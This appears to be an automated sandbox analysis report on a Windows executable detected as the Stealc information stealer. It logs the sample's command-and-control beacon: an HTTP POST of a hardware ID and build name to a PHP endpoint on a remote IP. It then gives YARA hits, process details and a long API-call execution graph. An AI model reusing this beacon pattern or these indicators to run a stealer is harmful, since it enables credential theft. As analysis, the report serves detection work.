                                             Nov 1, 2024 17:44:05.098052979 CET | 80 | 49704 | 95.215.207.176 | 192.168.2.5
                                             Nov 1, 2024 17:44:05.331342936 CET | 80 | 49704 | 95.215.207.176 | 192.168.2.5
                                             Nov 1, 2024 17:44:05.331408024 CET | 49704 | 80 | 192.168.2.5 | 95.215.207.176
                                             Nov 1, 2024 17:44:10.447249889 CET | 80 | 49704 | 95.215.207.176 | 192.168.2.5
                                             Nov 1, 2024 17:44:10.447340965 CET | 49704 | 80 | 192.168.2.5 | 95.215.207.176
                                             Nov 1, 2024 17:44:25.352612972 CET | 49704 | 80 | 192.168.2.5 | 95.215.207.176
                                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                             Nov 1, 2024 17:44:45.834628105 CET | 53 | 50290 | 162.159.36.2 | 192.168.2.5
                                             Nov 1, 2024 17:44:46.559715033 CET | 53 | 58545 | 1.1.1.1 | 192.168.2.5
                                            • 95.215.207.176
                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                             0 | 192.168.2.5 | 49704 | 95.215.207.176 | 80 | 1436 | C:\Users\user\Desktop\lxEu3xfjIb.exe
                                             Timestamp | Bytes transferred | Direction | Data
                                             Nov 1, 2024 17:44:04.270138025 CET | 89 | OUT | GET / HTTP/1.1
                                            Host: 95.215.207.176
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                             Nov 1, 2024 17:44:05.085376024 CET | 203 | IN | HTTP/1.1 200 OK
                                            Date: Fri, 01 Nov 2024 16:44:04 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Content-Length: 0
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                             Nov 1, 2024 17:44:05.091948986 CET | 417 | OUT | POST /d8ddb681db736e16.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFC
                                            Host: 95.215.207.176
                                            Content-Length: 216
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                             Data Ascii:
                                             ------BGDAAKJJDAAKFHJKJKFC
                                             Content-Disposition: form-data; name="hwid"
                                             
                                             5130ED8CE3B3476522507
                                             ------BGDAAKJJDAAKFHJKJKFC
                                             Content-Disposition: form-data; name="build"
                                             
                                             LogsDiller
                                             ------BGDAAKJJDAAKFHJKJKFC--
                                             Nov 1, 2024 17:44:05.331342936 CET | 210 | IN | HTTP/1.1 200 OK
                                            Date: Fri, 01 Nov 2024 16:44:05 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Content-Length: 8
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 59 6d 78 76 59 32 73 3d
                                            Data Ascii: YmxvY2s=



                                            Target ID:0
                                            Start time:12:43:59
                                            Start date:01/11/2024
                                            Path:C:\Users\user\Desktop\lxEu3xfjIb.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\lxEu3xfjIb.exe"
                                            Imagebase:0x400000
                                            File size:649'728 bytes
                                            MD5 hash:BB99CDE9173EE6E21B61963F6A4A60DA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2288500521.0000000002C23000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:true

                                            Target ID:4
                                            Start time:12:44:05
                                            Start date:01/11/2024
                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1052
                                            Imagebase:0xc10000
                                            File size:483'680 bytes
                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true


                                              Execution Graph

                                              Execution Coverage:3.1%
                                              Dynamic/Decrypted Code Coverage:2.1%
                                              Signature Coverage:13.1%
                                              Total number of Nodes:1355
                                              Total number of Limit Nodes:27
46288->46289 46290 41aafc 46289->46290 46291 41aaea lstrcpy 46289->46291 46290->46074 46291->46290 46293 41aa50 lstrcpy 46292->46293 46294 416ad3 46293->46294 46295 41acc0 4 API calls 46294->46295 46296 416ae5 46295->46296 46297 41abb0 lstrcpy 46296->46297 46298 416aee 46297->46298 46299 41acc0 4 API calls 46298->46299 46300 416b07 46299->46300 46301 41abb0 lstrcpy 46300->46301 46302 416b10 46301->46302 46303 41acc0 4 API calls 46302->46303 46304 416b2a 46303->46304 46305 41abb0 lstrcpy 46304->46305 46306 416b33 46305->46306 46307 41acc0 4 API calls 46306->46307 46308 416b4c 46307->46308 46309 41abb0 lstrcpy 46308->46309 46310 416b55 46309->46310 46311 41acc0 4 API calls 46310->46311 46312 416b6f 46311->46312 46313 41abb0 lstrcpy 46312->46313 46314 416b78 46313->46314 46315 41acc0 4 API calls 46314->46315 46316 416b93 46315->46316 46317 41abb0 lstrcpy 46316->46317 46318 416b9c 46317->46318 46319 41aab0 lstrcpy 46318->46319 46320 416bb0 46319->46320 46320->46081 46322 41ab22 46321->46322 46322->46084 46324 41ab4f 46323->46324 46325 415da4 46324->46325 46326 41ab8b lstrcpy 46324->46326 46325->46094 46326->46325 46328 41abb0 lstrcpy 46327->46328 46329 416693 46328->46329 46330 41abb0 lstrcpy 46329->46330 46331 4166a5 46330->46331 46332 41abb0 lstrcpy 46331->46332 46333 4166b7 46332->46333 46334 41abb0 lstrcpy 46333->46334 46335 415dd6 46334->46335 46335->46100 46337 404610 34 API calls 46336->46337 46338 402704 46337->46338 46339 404610 34 API calls 46338->46339 46340 402727 46339->46340 46341 404610 34 API calls 46340->46341 46342 402740 46341->46342 46343 404610 34 API calls 46342->46343 46344 402759 46343->46344 46345 404610 34 API calls 46344->46345 46346 402786 46345->46346 46347 404610 34 API calls 46346->46347 46348 40279f 46347->46348 46349 404610 34 API calls 46348->46349 46350 4027b8 46349->46350 46351 404610 34 API calls 46350->46351 46352 4027e5 46351->46352 46353 404610 34 API calls 46352->46353 46354 4027fe 46353->46354 46355 404610 34 API calls 
46354->46355 46356 402817 46355->46356 46357 404610 34 API calls 46356->46357 46358 402830 46357->46358 46359 404610 34 API calls 46358->46359 46360 402849 46359->46360 46361 404610 34 API calls 46360->46361 46362 402862 46361->46362 46363 404610 34 API calls 46362->46363 46364 40287b 46363->46364 46365 404610 34 API calls 46364->46365 46366 402894 46365->46366 46367 404610 34 API calls 46366->46367 46368 4028ad 46367->46368 46369 404610 34 API calls 46368->46369 46370 4028c6 46369->46370 46371 404610 34 API calls 46370->46371 46372 4028df 46371->46372 46373 404610 34 API calls 46372->46373 46374 4028f8 46373->46374 46375 404610 34 API calls 46374->46375 46376 402911 46375->46376 46377 404610 34 API calls 46376->46377 46378 40292a 46377->46378 46379 404610 34 API calls 46378->46379 46380 402943 46379->46380 46381 404610 34 API calls 46380->46381 46382 40295c 46381->46382 46383 404610 34 API calls 46382->46383 46384 402975 46383->46384 46385 404610 34 API calls 46384->46385 46386 40298e 46385->46386 46387 404610 34 API calls 46386->46387 46388 4029a7 46387->46388 46389 404610 34 API calls 46388->46389 46390 4029c0 46389->46390 46391 404610 34 API calls 46390->46391 46392 4029d9 46391->46392 46393 404610 34 API calls 46392->46393 46394 4029f2 46393->46394 46395 404610 34 API calls 46394->46395 46396 402a0b 46395->46396 46397 404610 34 API calls 46396->46397 46398 402a24 46397->46398 46399 404610 34 API calls 46398->46399 46400 402a3d 46399->46400 46401 404610 34 API calls 46400->46401 46402 402a56 46401->46402 46403 404610 34 API calls 46402->46403 46404 402a6f 46403->46404 46405 404610 34 API calls 46404->46405 46406 402a88 46405->46406 46407 404610 34 API calls 46406->46407 46408 402aa1 46407->46408 46409 404610 34 API calls 46408->46409 46410 402aba 46409->46410 46411 404610 34 API calls 46410->46411 46412 402ad3 46411->46412 46413 404610 34 API calls 46412->46413 46414 402aec 46413->46414 46415 404610 34 API calls 46414->46415 46416 402b05 46415->46416 46417 
404610 34 API calls 46416->46417 46418 402b1e 46417->46418 46419 404610 34 API calls 46418->46419 46420 402b37 46419->46420 46421 404610 34 API calls 46420->46421 46422 402b50 46421->46422 46423 404610 34 API calls 46422->46423 46424 402b69 46423->46424 46425 404610 34 API calls 46424->46425 46426 402b82 46425->46426 46427 404610 34 API calls 46426->46427 46428 402b9b 46427->46428 46429 404610 34 API calls 46428->46429 46430 402bb4 46429->46430 46431 404610 34 API calls 46430->46431 46432 402bcd 46431->46432 46433 404610 34 API calls 46432->46433 46434 402be6 46433->46434 46435 404610 34 API calls 46434->46435 46436 402bff 46435->46436 46437 404610 34 API calls 46436->46437 46438 402c18 46437->46438 46439 404610 34 API calls 46438->46439 46440 402c31 46439->46440 46441 404610 34 API calls 46440->46441 46442 402c4a 46441->46442 46443 404610 34 API calls 46442->46443 46444 402c63 46443->46444 46445 404610 34 API calls 46444->46445 46446 402c7c 46445->46446 46447 404610 34 API calls 46446->46447 46448 402c95 46447->46448 46449 404610 34 API calls 46448->46449 46450 402cae 46449->46450 46451 404610 34 API calls 46450->46451 46452 402cc7 46451->46452 46453 404610 34 API calls 46452->46453 46454 402ce0 46453->46454 46455 404610 34 API calls 46454->46455 46456 402cf9 46455->46456 46457 404610 34 API calls 46456->46457 46458 402d12 46457->46458 46459 404610 34 API calls 46458->46459 46460 402d2b 46459->46460 46461 404610 34 API calls 46460->46461 46462 402d44 46461->46462 46463 404610 34 API calls 46462->46463 46464 402d5d 46463->46464 46465 404610 34 API calls 46464->46465 46466 402d76 46465->46466 46467 404610 34 API calls 46466->46467 46468 402d8f 46467->46468 46469 404610 34 API calls 46468->46469 46470 402da8 46469->46470 46471 404610 34 API calls 46470->46471 46472 402dc1 46471->46472 46473 404610 34 API calls 46472->46473 46474 402dda 46473->46474 46475 404610 34 API calls 46474->46475 46476 402df3 46475->46476 46477 404610 34 API calls 46476->46477 46478 402e0c 
46477->46478 46479 404610 34 API calls 46478->46479 46480 402e25 46479->46480 46481 404610 34 API calls 46480->46481 46482 402e3e 46481->46482 46483 404610 34 API calls 46482->46483 46484 402e57 46483->46484 46485 404610 34 API calls 46484->46485 46486 402e70 46485->46486 46487 404610 34 API calls 46486->46487 46488 402e89 46487->46488 46489 404610 34 API calls 46488->46489 46490 402ea2 46489->46490 46491 404610 34 API calls 46490->46491 46492 402ebb 46491->46492 46493 404610 34 API calls 46492->46493 46494 402ed4 46493->46494 46495 404610 34 API calls 46494->46495 46496 402eed 46495->46496 46497 404610 34 API calls 46496->46497 46498 402f06 46497->46498 46499 404610 34 API calls 46498->46499 46500 402f1f 46499->46500 46501 404610 34 API calls 46500->46501 46502 402f38 46501->46502 46503 404610 34 API calls 46502->46503 46504 402f51 46503->46504 46505 404610 34 API calls 46504->46505 46506 402f6a 46505->46506 46507 404610 34 API calls 46506->46507 46508 402f83 46507->46508 46509 404610 34 API calls 46508->46509 46510 402f9c 46509->46510 46511 404610 34 API calls 46510->46511 46512 402fb5 46511->46512 46513 404610 34 API calls 46512->46513 46514 402fce 46513->46514 46515 404610 34 API calls 46514->46515 46516 402fe7 46515->46516 46517 404610 34 API calls 46516->46517 46518 403000 46517->46518 46519 404610 34 API calls 46518->46519 46520 403019 46519->46520 46521 404610 34 API calls 46520->46521 46522 403032 46521->46522 46523 404610 34 API calls 46522->46523 46524 40304b 46523->46524 46525 404610 34 API calls 46524->46525 46526 403064 46525->46526 46527 404610 34 API calls 46526->46527 46528 40307d 46527->46528 46529 404610 34 API calls 46528->46529 46530 403096 46529->46530 46531 404610 34 API calls 46530->46531 46532 4030af 46531->46532 46533 404610 34 API calls 46532->46533 46534 4030c8 46533->46534 46535 404610 34 API calls 46534->46535 46536 4030e1 46535->46536 46537 404610 34 API calls 46536->46537 46538 4030fa 46537->46538 46539 404610 34 API calls 
46538->46539 46540 403113 46539->46540 46541 404610 34 API calls 46540->46541 46542 40312c 46541->46542 46543 404610 34 API calls 46542->46543 46544 403145 46543->46544 46545 404610 34 API calls 46544->46545 46546 40315e 46545->46546 46547 404610 34 API calls 46546->46547 46548 403177 46547->46548 46549 404610 34 API calls 46548->46549 46550 403190 46549->46550 46551 404610 34 API calls 46550->46551 46552 4031a9 46551->46552 46553 404610 34 API calls 46552->46553 46554 4031c2 46553->46554 46555 404610 34 API calls 46554->46555 46556 4031db 46555->46556 46557 404610 34 API calls 46556->46557 46558 4031f4 46557->46558 46559 404610 34 API calls 46558->46559 46560 40320d 46559->46560 46561 404610 34 API calls 46560->46561 46562 403226 46561->46562 46563 404610 34 API calls 46562->46563 46564 40323f 46563->46564 46565 404610 34 API calls 46564->46565 46566 403258 46565->46566 46567 404610 34 API calls 46566->46567 46568 403271 46567->46568 46569 404610 34 API calls 46568->46569 46570 40328a 46569->46570 46571 404610 34 API calls 46570->46571 46572 4032a3 46571->46572 46573 404610 34 API calls 46572->46573 46574 4032bc 46573->46574 46575 404610 34 API calls 46574->46575 46576 4032d5 46575->46576 46577 404610 34 API calls 46576->46577 46578 4032ee 46577->46578 46579 404610 34 API calls 46578->46579 46580 403307 46579->46580 46581 404610 34 API calls 46580->46581 46582 403320 46581->46582 46583 404610 34 API calls 46582->46583 46584 403339 46583->46584 46585 404610 34 API calls 46584->46585 46586 403352 46585->46586 46587 404610 34 API calls 46586->46587 46588 40336b 46587->46588 46589 404610 34 API calls 46588->46589 46590 403384 46589->46590 46591 404610 34 API calls 46590->46591 46592 40339d 46591->46592 46593 404610 34 API calls 46592->46593 46594 4033b6 46593->46594 46595 404610 34 API calls 46594->46595 46596 4033cf 46595->46596 46597 404610 34 API calls 46596->46597 46598 4033e8 46597->46598 46599 404610 34 API calls 46598->46599 46600 403401 46599->46600 46601 
404610 34 API calls 46600->46601 46602 40341a 46601->46602 46603 404610 34 API calls 46602->46603 46604 403433 46603->46604 46605 404610 34 API calls 46604->46605 46606 40344c 46605->46606 46607 404610 34 API calls 46606->46607 46608 403465 46607->46608 46609 404610 34 API calls 46608->46609 46610 40347e 46609->46610 46611 404610 34 API calls 46610->46611 46612 403497 46611->46612 46613 404610 34 API calls 46612->46613 46614 4034b0 46613->46614 46615 404610 34 API calls 46614->46615 46616 4034c9 46615->46616 46617 404610 34 API calls 46616->46617 46618 4034e2 46617->46618 46619 404610 34 API calls 46618->46619 46620 4034fb 46619->46620 46621 404610 34 API calls 46620->46621 46622 403514 46621->46622 46623 404610 34 API calls 46622->46623 46624 40352d 46623->46624 46625 404610 34 API calls 46624->46625 46626 403546 46625->46626 46627 404610 34 API calls 46626->46627 46628 40355f 46627->46628 46629 404610 34 API calls 46628->46629 46630 403578 46629->46630 46631 404610 34 API calls 46630->46631 46632 403591 46631->46632 46633 404610 34 API calls 46632->46633 46634 4035aa 46633->46634 46635 404610 34 API calls 46634->46635 46636 4035c3 46635->46636 46637 404610 34 API calls 46636->46637 46638 4035dc 46637->46638 46639 404610 34 API calls 46638->46639 46640 4035f5 46639->46640 46641 404610 34 API calls 46640->46641 46642 40360e 46641->46642 46643 404610 34 API calls 46642->46643 46644 403627 46643->46644 46645 404610 34 API calls 46644->46645 46646 403640 46645->46646 46647 404610 34 API calls 46646->46647 46648 403659 46647->46648 46649 404610 34 API calls 46648->46649 46650 403672 46649->46650 46651 404610 34 API calls 46650->46651 46652 40368b 46651->46652 46653 404610 34 API calls 46652->46653 46654 4036a4 46653->46654 46655 404610 34 API calls 46654->46655 46656 4036bd 46655->46656 46657 404610 34 API calls 46656->46657 46658 4036d6 46657->46658 46659 404610 34 API calls 46658->46659 46660 4036ef 46659->46660 46661 404610 34 API calls 46660->46661 46662 403708 
46661->46662 46663 404610 34 API calls 46662->46663 46664 403721 46663->46664 46665 404610 34 API calls 46664->46665 46666 40373a 46665->46666 46667 404610 34 API calls 46666->46667 46668 403753 46667->46668 46669 404610 34 API calls 46668->46669 46670 40376c 46669->46670 46671 404610 34 API calls 46670->46671 46672 403785 46671->46672 46673 404610 34 API calls 46672->46673 46674 40379e 46673->46674 46675 404610 34 API calls 46674->46675 46676 4037b7 46675->46676 46677 404610 34 API calls 46676->46677 46678 4037d0 46677->46678 46679 404610 34 API calls 46678->46679 46680 4037e9 46679->46680 46681 404610 34 API calls 46680->46681 46682 403802 46681->46682 46683 404610 34 API calls 46682->46683 46684 40381b 46683->46684 46685 404610 34 API calls 46684->46685 46686 403834 46685->46686 46687 404610 34 API calls 46686->46687 46688 40384d 46687->46688 46689 404610 34 API calls 46688->46689 46690 403866 46689->46690 46691 404610 34 API calls 46690->46691 46692 40387f 46691->46692 46693 404610 34 API calls 46692->46693 46694 403898 46693->46694 46695 404610 34 API calls 46694->46695 46696 4038b1 46695->46696 46697 404610 34 API calls 46696->46697 46698 4038ca 46697->46698 46699 404610 34 API calls 46698->46699 46700 4038e3 46699->46700 46701 404610 34 API calls 46700->46701 46702 4038fc 46701->46702 46703 404610 34 API calls 46702->46703 46704 403915 46703->46704 46705 404610 34 API calls 46704->46705 46706 40392e 46705->46706 46707 404610 34 API calls 46706->46707 46708 403947 46707->46708 46709 404610 34 API calls 46708->46709 46710 403960 46709->46710 46711 404610 34 API calls 46710->46711 46712 403979 46711->46712 46713 404610 34 API calls 46712->46713 46714 403992 46713->46714 46715 404610 34 API calls 46714->46715 46716 4039ab 46715->46716 46717 404610 34 API calls 46716->46717 46718 4039c4 46717->46718 46719 404610 34 API calls 46718->46719 46720 4039dd 46719->46720 46721 404610 34 API calls 46720->46721 46722 4039f6 46721->46722 46723 404610 34 API calls 
46722->46723 46724 403a0f 46723->46724 46725 404610 34 API calls 46724->46725 46726 403a28 46725->46726 46727 404610 34 API calls 46726->46727 46728 403a41 46727->46728 46729 404610 34 API calls 46728->46729 46730 403a5a 46729->46730 46731 404610 34 API calls 46730->46731 46732 403a73 46731->46732 46733 404610 34 API calls 46732->46733 46734 403a8c 46733->46734 46735 404610 34 API calls 46734->46735 46736 403aa5 46735->46736 46737 404610 34 API calls 46736->46737 46738 403abe 46737->46738 46739 404610 34 API calls 46738->46739 46740 403ad7 46739->46740 46741 404610 34 API calls 46740->46741 46742 403af0 46741->46742 46743 404610 34 API calls 46742->46743 46744 403b09 46743->46744 46745 404610 34 API calls 46744->46745 46746 403b22 46745->46746 46747 404610 34 API calls 46746->46747 46748 403b3b 46747->46748 46749 404610 34 API calls 46748->46749 46750 403b54 46749->46750 46751 404610 34 API calls 46750->46751 46752 403b6d 46751->46752 46753 404610 34 API calls 46752->46753 46754 403b86 46753->46754 46755 404610 34 API calls 46754->46755 46756 403b9f 46755->46756 46757 404610 34 API calls 46756->46757 46758 403bb8 46757->46758 46759 404610 34 API calls 46758->46759 46760 403bd1 46759->46760 46761 404610 34 API calls 46760->46761 46762 403bea 46761->46762 46763 404610 34 API calls 46762->46763 46764 403c03 46763->46764 46765 404610 34 API calls 46764->46765 46766 403c1c 46765->46766 46767 404610 34 API calls 46766->46767 46768 403c35 46767->46768 46769 404610 34 API calls 46768->46769 46770 403c4e 46769->46770 46771 404610 34 API calls 46770->46771 46772 403c67 46771->46772 46773 404610 34 API calls 46772->46773 46774 403c80 46773->46774 46775 404610 34 API calls 46774->46775 46776 403c99 46775->46776 46777 404610 34 API calls 46776->46777 46778 403cb2 46777->46778 46779 404610 34 API calls 46778->46779 46780 403ccb 46779->46780 46781 404610 34 API calls 46780->46781 46782 403ce4 46781->46782 46783 404610 34 API calls 46782->46783 46784 403cfd 46783->46784 46785 
404610 34 API calls 46784->46785 46786 403d16 46785->46786 46787 404610 34 API calls 46786->46787 46788 403d2f 46787->46788 46789 404610 34 API calls 46788->46789 46790 403d48 46789->46790 46791 404610 34 API calls 46790->46791 46792 403d61 46791->46792 46793 404610 34 API calls 46792->46793 46794 403d7a 46793->46794 46795 404610 34 API calls 46794->46795 46796 403d93 46795->46796 46797 404610 34 API calls 46796->46797 46798 403dac 46797->46798 46799 404610 34 API calls 46798->46799 46800 403dc5 46799->46800 46801 404610 34 API calls 46800->46801 46802 403dde 46801->46802 46803 404610 34 API calls 46802->46803 46804 403df7 46803->46804 46805 404610 34 API calls 46804->46805 46806 403e10 46805->46806 46807 404610 34 API calls 46806->46807 46808 403e29 46807->46808 46809 404610 34 API calls 46808->46809 46810 403e42 46809->46810 46811 404610 34 API calls 46810->46811 46812 403e5b 46811->46812 46813 404610 34 API calls 46812->46813 46814 403e74 46813->46814 46815 404610 34 API calls 46814->46815 46816 403e8d 46815->46816 46817 404610 34 API calls 46816->46817 46818 403ea6 46817->46818 46819 404610 34 API calls 46818->46819 46820 403ebf 46819->46820 46821 404610 34 API calls 46820->46821 46822 403ed8 46821->46822 46823 404610 34 API calls 46822->46823 46824 403ef1 46823->46824 46825 404610 34 API calls 46824->46825 46826 403f0a 46825->46826 46827 404610 34 API calls 46826->46827 46828 403f23 46827->46828 46829 404610 34 API calls 46828->46829 46830 403f3c 46829->46830 46831 404610 34 API calls 46830->46831 46832 403f55 46831->46832 46833 404610 34 API calls 46832->46833 46834 403f6e 46833->46834 46835 404610 34 API calls 46834->46835 46836 403f87 46835->46836 46837 404610 34 API calls 46836->46837 46838 403fa0 46837->46838 46839 404610 34 API calls 46838->46839 46840 403fb9 46839->46840 46841 404610 34 API calls 46840->46841 46842 403fd2 46841->46842 46843 404610 34 API calls 46842->46843 46844 403feb 46843->46844 46845 404610 34 API calls 46844->46845 46846 404004 
46845->46846 46847 404610 34 API calls 46846->46847 46848 40401d 46847->46848 46849 404610 34 API calls 46848->46849 46850 404036 46849->46850 46851 404610 34 API calls 46850->46851 46852 40404f 46851->46852 46853 404610 34 API calls 46852->46853 46854 404068 46853->46854 46855 404610 34 API calls 46854->46855 46856 404081 46855->46856 46857 404610 34 API calls 46856->46857 46858 40409a 46857->46858 46859 404610 34 API calls 46858->46859 46860 4040b3 46859->46860 46861 404610 34 API calls 46860->46861 46862 4040cc 46861->46862 46863 404610 34 API calls 46862->46863 46864 4040e5 46863->46864 46865 404610 34 API calls 46864->46865 46866 4040fe 46865->46866 46867 404610 34 API calls 46866->46867 46868 404117 46867->46868 46869 404610 34 API calls 46868->46869 46870 404130 46869->46870 46871 404610 34 API calls 46870->46871 46872 404149 46871->46872 46873 404610 34 API calls 46872->46873 46874 404162 46873->46874 46875 404610 34 API calls 46874->46875 46876 40417b 46875->46876 46877 404610 34 API calls 46876->46877 46878 404194 46877->46878 46879 404610 34 API calls 46878->46879 46880 4041ad 46879->46880 46881 404610 34 API calls 46880->46881 46882 4041c6 46881->46882 46883 404610 34 API calls 46882->46883 46884 4041df 46883->46884 46885 404610 34 API calls 46884->46885 46886 4041f8 46885->46886 46887 404610 34 API calls 46886->46887 46888 404211 46887->46888 46889 404610 34 API calls 46888->46889 46890 40422a 46889->46890 46891 404610 34 API calls 46890->46891 46892 404243 46891->46892 46893 404610 34 API calls 46892->46893 46894 40425c 46893->46894 46895 404610 34 API calls 46894->46895 46896 404275 46895->46896 46897 404610 34 API calls 46896->46897 46898 40428e 46897->46898 46899 404610 34 API calls 46898->46899 46900 4042a7 46899->46900 46901 404610 34 API calls 46900->46901 46902 4042c0 46901->46902 46903 404610 34 API calls 46902->46903 46904 4042d9 46903->46904 46905 404610 34 API calls 46904->46905 46906 4042f2 46905->46906 46907 404610 34 API calls 
46906->46907 46908 40430b 46907->46908 46909 404610 34 API calls 46908->46909 46910 404324 46909->46910 46911 404610 34 API calls 46910->46911 46912 40433d 46911->46912 46913 404610 34 API calls 46912->46913 46914 404356 46913->46914 46915 404610 34 API calls 46914->46915 46916 40436f 46915->46916 46917 404610 34 API calls 46916->46917 46918 404388 46917->46918 46919 404610 34 API calls 46918->46919 46920 4043a1 46919->46920 46921 404610 34 API calls 46920->46921 46922 4043ba 46921->46922 46923 404610 34 API calls 46922->46923 46924 4043d3 46923->46924 46925 404610 34 API calls 46924->46925 46926 4043ec 46925->46926 46927 404610 34 API calls 46926->46927 46928 404405 46927->46928 46929 404610 34 API calls 46928->46929 46930 40441e 46929->46930 46931 404610 34 API calls 46930->46931 46932 404437 46931->46932 46933 404610 34 API calls 46932->46933 46934 404450 46933->46934 46935 404610 34 API calls 46934->46935 46936 404469 46935->46936 46937 404610 34 API calls 46936->46937 46938 404482 46937->46938 46939 404610 34 API calls 46938->46939 46940 40449b 46939->46940 46941 404610 34 API calls 46940->46941 46942 4044b4 46941->46942 46943 404610 34 API calls 46942->46943 46944 4044cd 46943->46944 46945 404610 34 API calls 46944->46945 46946 4044e6 46945->46946 46947 404610 34 API calls 46946->46947 46948 4044ff 46947->46948 46949 404610 34 API calls 46948->46949 46950 404518 46949->46950 46951 404610 34 API calls 46950->46951 46952 404531 46951->46952 46953 404610 34 API calls 46952->46953 46954 40454a 46953->46954 46955 404610 34 API calls 46954->46955 46956 404563 46955->46956 46957 404610 34 API calls 46956->46957 46958 40457c 46957->46958 46959 404610 34 API calls 46958->46959 46960 404595 46959->46960 46961 404610 34 API calls 46960->46961 46962 4045ae 46961->46962 46963 404610 34 API calls 46962->46963 46964 4045c7 46963->46964 46965 404610 34 API calls 46964->46965 46966 4045e0 46965->46966 46967 404610 34 API calls 46966->46967 46968 4045f9 46967->46968 46969 
419f20 46968->46969 46970 419f30 43 API calls 46969->46970 46971 41a346 8 API calls 46969->46971 46970->46971 46972 41a456 46971->46972 46973 41a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 46971->46973 46974 41a463 8 API calls 46972->46974 46975 41a526 46972->46975 46973->46972 46974->46975 46976 41a5a8 46975->46976 46977 41a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 46975->46977 46978 41a5b5 6 API calls 46976->46978 46979 41a647 46976->46979 46977->46976 46978->46979 46980 41a654 9 API calls 46979->46980 46981 41a72f 46979->46981 46980->46981 46982 41a7b2 46981->46982 46983 41a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 46981->46983 46984 41a7bb GetProcAddress GetProcAddress 46982->46984 46985 41a7ec 46982->46985 46983->46982 46984->46985 46986 41a825 46985->46986 46987 41a7f5 GetProcAddress GetProcAddress 46985->46987 46988 41a922 46986->46988 46989 41a832 10 API calls 46986->46989 46987->46986 46990 41a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 46988->46990 46991 41a98d 46988->46991 46989->46988 46990->46991 46992 41a996 GetProcAddress 46991->46992 46993 41a9ae 46991->46993 46992->46993 46994 41a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 46993->46994 46995 415ef3 46993->46995 46994->46995 46996 401590 46995->46996 47271 4016b0 46996->47271 46999 41aab0 lstrcpy 47000 4015b5 46999->47000 47001 41aab0 lstrcpy 47000->47001 47002 4015c7 47001->47002 47003 41aab0 lstrcpy 47002->47003 47004 4015d9 47003->47004 47005 41aab0 lstrcpy 47004->47005 47006 401663 47005->47006 47007 415760 47006->47007 47008 415771 47007->47008 47009 41ab30 2 API calls 47008->47009 47010 41577e 47009->47010 47011 41ab30 2 API calls 47010->47011 47012 41578b 47011->47012 47013 41ab30 2 API calls 47012->47013 47014 415798 47013->47014 47015 41aa50 lstrcpy 47014->47015 47016 4157a5 47015->47016 47017 41aa50 lstrcpy 47016->47017 47018 4157b2 
47017->47018 47019 41aa50 lstrcpy 47018->47019 47020 4157bf 47019->47020 47021 41aa50 lstrcpy 47020->47021 47061 4157cc 47021->47061 47022 41ab30 lstrlenA lstrcpy 47022->47061 47023 41aa50 lstrcpy 47023->47061 47024 41aab0 lstrcpy 47024->47061 47025 41abb0 lstrcpy 47025->47061 47026 415893 StrCmpCA 47026->47061 47027 4158f0 StrCmpCA 47028 415a2c 47027->47028 47027->47061 47029 41abb0 lstrcpy 47028->47029 47030 415a38 47029->47030 47031 41ab30 2 API calls 47030->47031 47032 415a46 47031->47032 47035 41ab30 2 API calls 47032->47035 47033 415aa6 StrCmpCA 47036 415be1 47033->47036 47033->47061 47034 415440 23 API calls 47034->47061 47037 415a55 47035->47037 47038 41abb0 lstrcpy 47036->47038 47039 4016b0 lstrcpy 47037->47039 47040 415bed 47038->47040 47060 415a61 47039->47060 47041 41ab30 2 API calls 47040->47041 47042 415bfb 47041->47042 47045 41ab30 2 API calls 47042->47045 47043 415c5b StrCmpCA 47046 415c66 Sleep 47043->47046 47047 415c78 47043->47047 47044 415510 29 API calls 47044->47061 47048 415c0a 47045->47048 47046->47061 47049 41abb0 lstrcpy 47047->47049 47050 4016b0 lstrcpy 47048->47050 47051 415c84 47049->47051 47050->47060 47052 41ab30 2 API calls 47051->47052 47053 415c93 47052->47053 47054 41ab30 2 API calls 47053->47054 47056 415ca2 47054->47056 47055 4159da StrCmpCA 47055->47061 47057 4016b0 lstrcpy 47056->47057 47057->47060 47058 415b8f StrCmpCA 47058->47061 47059 401590 lstrcpy 